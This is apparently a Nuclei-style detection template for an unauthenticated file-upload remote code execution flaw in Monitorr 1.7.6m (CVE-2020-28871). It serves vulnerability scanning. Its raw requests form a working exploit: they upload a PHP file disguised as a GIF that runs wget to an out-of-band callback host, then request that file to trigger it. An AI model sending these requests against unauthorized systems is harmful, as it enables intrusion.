id: CVE-2020-28871

info:
  name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution
  author: gy741
  severity: critical
  description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28871
    - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
    - https://www.exploit-db.com/exploits/48980
  tags: cve,cve2020,monitorr,rce,oob

requests:
  - raw:
      - |
        POST /assets/php/upload.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: text/plain, */*; q=0.01
        Connection: close
        Accept-Language: en-US,en;q=0.5
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745
        Origin: http://{{Hostname}}
        Referer: http://{{Hostname}}

        -----------------------------31046105003900160576454225745
        Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
        Content-Type: image/gif

        GIF89a213213123<?php shell_exec("wget -c http://{{interactsh-url}}");

        -----------------------------31046105003900160576454225745--

      - |
        GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"